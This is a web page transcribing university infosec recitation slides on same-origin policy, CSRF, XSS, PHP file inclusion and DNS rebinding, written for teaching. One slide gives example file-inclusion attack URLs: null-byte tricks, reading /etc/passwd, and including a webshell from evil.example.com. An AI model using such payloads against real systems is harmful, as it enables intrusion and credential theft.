introduction to infosec recitation 9
Download
Skip this Video
Download Presentation
Introduction to InfoSec – Recitation 9

Loading in 2 Seconds...

play fullscreen
1 / 18

Introduction to InfoSec – Recitation 9 - PowerPoint PPT Presentation


  • 126 Views
  • Uploaded on

Introduction to InfoSec – Recitation 9. Nir Krakowski ( nirkrako at post.tau.ac.il) Itamar Gilad ( itamargi at post.tau.ac.il). Today. SOP - Same origin policy CSRF – Cross site request Forgery XSS – Cross Site Scripting PHP file inclusion vulnerabilities

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about ' Introduction to InfoSec – Recitation 9' - reese-walter


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
introduction to infosec recitation 9

Introduction to InfoSec – Recitation 9

Nir Krakowski (nirkrako at post.tau.ac.il)

ItamarGilad (itamargi at post.tau.ac.il)

today
Today
  • SOP - Same origin policy
  • CSRF – Cross site request Forgery
  • XSS – Cross Site Scripting
  • PHP file inclusion vulnerabilities
  • DNS rebinding (if we have time)
same origin policy
Same Origin Policy
  • Modern sites use elements from many different sources (e.g.: main content, embedded ads, embedded google maps controls, embedded twitter feed, etc.)
  • Without the SOP – we’d have to trust ALL that code
  • With the SOP – interactions are limited by ‘origin’
  • An origin is the combination of domain name and protocol type
cross site request forgery
Cross Site Request Forgery
  • User goes to malicious site
  • Site initiates a request to a different site (e.g.: Gmail)
  • Request is sent using user’s credentials
  • Site accepts request, but due to SOP – the attacker cannot read contents or state (‘blind’ attack)
  • Profit!
csrf limitations
CSRF - Limitations
  • Cannot spoof referrer header (but few sites check it)
  • Depends on a ‘GET’ request to cause side-effects
  • Blind attack – if the attack depends on any prior info, attacker has to guess
  • Attack must take place while the user is logged in to the target site
xss cross site scripting
XSS – Cross site scripting
  • Today, many sites just aggragate user-generated content
    • Forums
    • Facebook / Twitter / Reddit
    • Web mail
    • Ynet / nrg – ‘talkbacks’
  • That’s great, but what happens if we trust user submitted content?
  • A user can submit HTML code
  • Which can be malicious
how malicious are they
How malicious are they?
  • Once the malicious code runs in the context of the target site, it can do whatever the original site can
    • Steal javascript-accessible cookies
    • Use any aspect of the site’s API
      • Write posts
      • Add friends
      • Delete all user content
      • Send out mass-email
      • E.g.: Sammy is my hero
non persistent xss
Non persistent XSS
  • User clicks a link with extra parameters, the server reflects it back, without proper sanitation
persistent xss
Persistent XSS
  • Malicious user submits content to the target site via
    • Forum post / ‘talkback’ / FB post, twitter post
    • E-mail
    • Etc.
  • Content is not sanitized, and therefore – displayed to the user
  • The user’s browser treats it as code from the target site, thereby bypassing the SOP
  • Profit!
php file inclusion
PHP File Inclusion

Source: Wikipedia

php file inclusion cont
PHP File Inclusion cont.
  • /vulnerable.php?COLOR=C:\\ftp\\upload\\exploit - Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
  • /vulnerable.php?COLOR=C:\\notes.txt%00 - example using NULLs to remove the .phpsuffix, allowing access to files other than .php
  • /vulnerable.php?COLOR=/etc/passwd%00 - allows an attacker to read the contents of the passwd file on a UNIX system directory traversal
  • /vulnerable.php?COLOR=http://evil.example.com/webshell.txt?- injects a remotely hosted file containing a malicious code
dns rebinding csrf
DNS Rebinding CSRF
  • We’ll discuss a very specific example
  • Client has a home router, which we want to access
  • We can get the client to browse to attacker.com
  • But thanks for the SOP – JS code from attacker.com cannot access the router other than blindly (CSRF)
enter dns rebinding
Enter DNS Rebinding
  • The DNS for attacker.com returns two records:
    • Our web server public address
    • The requesting client’s address
  • By default, a browser will use the first address, and download our malicious JavaScript
  • That Javascript will make another request to attacker.com
  • But this time – the server will refuse the connection
  • The browser will happily try the next entry
dns rebinding cont
DNS Rebinding cont.
  • But that’s the client’s home router public address…
  • Which should be protected via a FW from access…
  • But since most routers are configured with interface-based rules, and have internal webservers that listen on 0.0.0.0:80 – it won’t matter – they will answer our client
  • So now our JS code can connect to attacker.com and access the home router!
  • And it can still connect back outside
dns rebinding doesn t work anymore
DNS Rebinding doesn’t work anymore
  • Most routers will use HTTP-authentication
  • You used to be able to browse to: http://user:[email protected]/
  • But it has been disabled. All HTTP auth now requires a user dialog
  • Which makes the attack non-feasible
  • Also, there are some browser and network mitigations one can do (DNS pinning, DNS filtering, NoScript, etc.)
ad